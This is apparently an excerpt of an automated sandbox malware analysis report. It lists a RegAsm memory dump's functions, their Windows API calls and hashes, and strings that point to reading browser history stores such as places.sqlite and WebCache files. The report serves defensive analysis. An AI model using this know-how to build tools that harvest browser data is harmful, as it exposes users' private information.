                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProcessTimes
                                                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                • API String ID: 116129598-3385500049
                                                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                • API String ID: 2887208581-2114579845
                                                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                • String ID: $$8
                                                                                                                                                                                • API String ID: 1475443563-435121686
                                                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                                                • String ID: }A
                                                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                Function 00404363 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$AllocateDirectoryFreeHeapSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                • API String ID: 3600401918-4050573280
                                                                                                                                                                                • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
